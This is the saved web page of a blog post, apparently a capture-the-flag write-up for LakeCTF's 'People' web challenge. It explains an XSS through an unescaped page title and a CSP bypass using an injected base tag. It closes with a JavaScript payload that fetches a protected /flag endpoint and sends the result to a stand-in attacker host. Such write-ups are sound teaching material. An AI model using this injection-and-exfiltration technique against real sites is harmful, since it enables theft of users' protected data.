<!DOCTYPE html>
<html lang="en"><head>
  <meta charset="utf-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="viewport" content="width=device-width, initial-scale=1"><!-- Begin Jekyll SEO tag v2.8.0 -->
<title>LakeCTF Qualifications People (Web) Writeup | cjxol.com</title>
<meta name="generator" content="Jekyll v3.8.7" />
<meta property="og:title" content="LakeCTF Qualifications People (Web) Writeup" />
<meta property="og:locale" content="en_US" />
<meta name="description" content="Note: Some of the links to external sites about the challenge in this post might become unavailable in the future." />
<meta property="og:description" content="Note: Some of the links to external sites about the challenge in this post might become unavailable in the future." />
<link rel="canonical" href="https://www.cjxol.com/posts/lakectf-web-people-writeup/" />
<meta property="og:url" content="https://www.cjxol.com/posts/lakectf-web-people-writeup/" />
<meta property="og:site_name" content="cjxol.com" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2022-10-12T00:00:00+01:00" />
<meta name="twitter:card" content="summary" />
<meta property="twitter:title" content="LakeCTF Qualifications People (Web) Writeup" />
<script type="application/ld+json">
{"@context":"https://schema.org","@type":"BlogPosting","dateModified":"2022-10-12T00:00:00+01:00","datePublished":"2022-10-12T00:00:00+01:00","description":"Note: Some of the links to external sites about the challenge in this post might become unavailable in the future.","headline":"LakeCTF Qualifications People (Web) Writeup","mainEntityOfPage":{"@type":"WebPage","@id":"https://www.cjxol.com/posts/lakectf-web-people-writeup/"},"url":"https://www.cjxol.com/posts/lakectf-web-people-writeup/"}</script>
<!-- End Jekyll SEO tag -->
<link rel="stylesheet" href="/assets/main.css"><link type="application/atom+xml" rel="alternate" href="https://www.cjxol.com/feed.xml" title="cjxol.com" /></head>
<body><header class="site-header" role="banner">

  <div class="wrapper"><a class="site-title" rel="author" href="/">cjxol.com</a><nav class="site-nav">
        <input type="checkbox" id="nav-trigger" class="nav-trigger" />
        <label for="nav-trigger">
          <span class="menu-icon">
            <svg viewBox="0 0 18 15" width="18px" height="15px">
              <path d="M18,1.484c0,0.82-0.665,1.484-1.484,1.484H1.484C0.665,2.969,0,2.304,0,1.484l0,0C0,0.665,0.665,0,1.484,0 h15.032C17.335,0,18,0.665,18,1.484L18,1.484z M18,7.516C18,8.335,17.335,9,16.516,9H1.484C0.665,9,0,8.335,0,7.516l0,0 c0-0.82,0.665-1.484,1.484-1.484h15.032C17.335,6.031,18,6.696,18,7.516L18,7.516z M18,13.516C18,14.335,17.335,15,16.516,15H1.484 C0.665,15,0,14.335,0,13.516l0,0c0-0.82,0.665-1.483,1.484-1.483h15.032C17.335,12.031,18,12.695,18,13.516L18,13.516z"/>
            </svg>
          </span>
        </label>

        <div class="trigger"><a class="page-link" href="/about/">About</a></div>
      </nav></div>
</header>
<main class="page-content" aria-label="Content">
      <div class="wrapper">
        <article class="post h-entry" itemscope itemtype="http://schema.org/BlogPosting">

  <header class="post-header">
    <h1 class="post-title p-name" itemprop="name headline">LakeCTF Qualifications People (Web) Writeup</h1>
    <p class="post-meta">
      <time class="dt-published" datetime="2022-10-12T00:00:00+01:00" itemprop="datePublished">Oct 12, 2022
      </time></p>
  </header>

  <div class="post-content e-content" itemprop="articleBody">
    <p><em>Note: Some of the links to external sites about the challenge in this post might become unavailable in the future.</em></p>

<p>This is my writeup to web challenge “<a href="https://ctf.polygl0ts.ch/challenges#People-18">People</a>” in <a href="https://ctf.polygl0ts.ch/">LakeCTF</a> Qualifications round. LakeCTF is orgnised by EPFL’s CTF team <a href="https://polygl0ts.ch/">polygl0ts</a>. This challenge is solved by 36 teams out of 191 teams scored at least 1 point on the scoreboard. In this challenge I exploited XSS and improper configuration of CSP, more specifically omitting <code class="highlighter-rouge">base-uri</code>.</p>

<p>The challenge has a downloadable. Examining the code and the application, users can signup a profile with bio and other information, as well as logging in. Upon logging in, user is redirected to their profile page where user information is shown. Users can also report their profile, resulting in the profile page being visited by an admin bot.</p>

<p>This type of web challenges with a bot visiting the page normally involves in exploiting cross-site scripting (XSS).</p>

<p>It appears that it is likely the XSS is on the profile page that the bot visits, and the page displays user information stored in the database. We set the information of the user when signing up the user, however, the signup endpoint is rate limited, so we cannot test many payload through that endpoint on the live website. There is another <code class="highlighter-rouge">/edit</code> endpoint which also enables us to update user information, and there is no rate limit on that endpoint, so we could conveniently test different input on the live website without setting up our own docker container.</p>

<p>Our team managed to quickly find the potential injection point on the profile page. Despite the input are escaped when rendering the page, we noticed that the title also shows data from the database, and the code does not escape it:</p>

<div class="language-html highlighter-rouge"><div class="highlight"><pre class="highlight"><code>{% set description = '%s at %s' % (user['title'], user['lab']) %}
{% block title %}{{user['fullname']}} | {{description|safe}}{% endblock %}
</code></pre></div></div>

<p>As shown above, the <code class="highlighter-rouge">safe</code> filter in the template disables escaping. Thus, we managed to put HTML and JavaScript code into the webpage.</p>

<h2 id="bypass-csp">Bypass CSP</h2>

<p>Despite we have managed to inject new tags and code, we could still not make the browser to execute our XSS code. This is because the app sets <code class="highlighter-rouge">Content-Security-Policy</code> HTTP header that only script tags with the defined nonce would run.</p>

<p>However, the CSP did not define <code class="highlighter-rouge">base-uri</code>, and two of the <code class="highlighter-rouge">&lt;script&gt;</code> tags on the profile page did not use full URL:</p>

<div class="language-html highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nt">&lt;script </span><span class="na">src=</span><span class="s">"/static/js/marked.min.js"</span> <span class="na">nonce=</span><span class="s">"qvAsaTf6Pe8F101A71nf7vOt1lktIAiK"</span><span class="nt">&gt;&lt;/script&gt;</span>
<span class="nt">&lt;script </span><span class="na">src=</span><span class="s">"/static/js/purify.min.js"</span> <span class="na">nonce=</span><span class="s">"qvAsaTf6Pe8F101A71nf7vOt1lktIAiK"</span><span class="nt">&gt;&lt;/script&gt;</span>
</code></pre></div></div>

<p>Conveniently, the XSS injection point is in <code class="highlighter-rouge">&lt;title&gt;</code>, which is in <code class="highlighter-rouge">&lt;head&gt;</code>, thus we are able to define new base:</p>

<div class="language-html highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nt">&lt;base</span> <span class="na">href=</span><span class="s">"https://my-server.example.com"</span><span class="nt">&gt;</span>
</code></pre></div></div>

<p>This will result in one of the script on the profile page to load from <code class="highlighter-rouge">https://my-server.example.com/static/js/marked.min.js</code> and execute.</p>

<p>The final info we set to user’s title in their profile is <code class="highlighter-rouge">&lt;/title&gt;&lt;base href="https://my-server.example.com"&gt;&lt;/head&gt;</code>, and we serve the JavaScript payload at <code class="highlighter-rouge">https://my-server.example.com/static/js/marked.min.js</code>.</p>

<h2 id="getting-the-flag">Getting the Flag</h2>

<p>Now we are able to make the profile page to pop an alert of whatever we put in the JavaScript file. However our goal is to steal the flag. The flag is accessible through the <code class="highlighter-rouge">/flag</code> endpoint in the webapp. The endpoint checks for <code class="highlighter-rouge">admin_token</code> in cookies. We might want to steal the cookies first, however, when the admin bot visits the webpage, their cookie is set to <code class="highlighter-rouge">httpOnly</code>, so we cannot use XSS to get the cookie. As getting the flag is our only goal, we can workaround by using <code class="highlighter-rouge">fetch</code> API or XMLHttpRequest. As when doing such request on the same site, cookies are sent, and flag will be retrieved.</p>

<p>Our final JavaScript for getting the flag and exfil is:</p>

<div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nx">fetch</span><span class="p">(</span><span class="dl">"</span><span class="s2">http://web:8080/flag</span><span class="dl">"</span><span class="p">)</span>
    <span class="p">.</span><span class="nx">then</span><span class="p">((</span><span class="nx">response</span><span class="p">)</span> <span class="o">=&gt;</span> <span class="nx">response</span><span class="p">.</span><span class="nx">text</span><span class="p">())</span>
    <span class="p">.</span><span class="nx">then</span><span class="p">((</span><span class="nx">data</span><span class="p">)</span> <span class="o">=&gt;</span> <span class="nx">fetch</span><span class="p">(</span><span class="dl">"</span><span class="s2">https://my-server.example.com/xss?</span><span class="dl">"</span> <span class="o">+</span> <span class="nx">data</span><span class="p">));</span>
</code></pre></div></div>

  </div><a class="u-url" href="/posts/lakectf-web-people-writeup/" hidden></a>
</article>

      </div>
    </main><footer class="site-footer h-card">
  <data class="u-url" href="/"></data>

  <div class="wrapper">

    <h2 class="footer-heading">cjxol.com</h2>

    <div class="footer-col-wrapper">
      <div class="footer-col footer-col-1">
        <ul class="contact-list">
          <li class="p-name">cjxol.com</li><li><a class="u-email" href="mailto:i@cjxol.com">i@cjxol.com</a></li></ul>
      </div>

      <div class="footer-col footer-col-2"><ul class="social-media-list"><li><a href="https://github.com/allc"><svg class="svg-icon"><use xlink:href="/assets/minima-social-icons.svg#github"></use></svg> <span class="username">allc</span></a></li></ul>
</div>

      <div class="footer-col footer-col-3">
        <p></p>
      </div>
    </div>

  </div>

</footer>
</body>

</html>
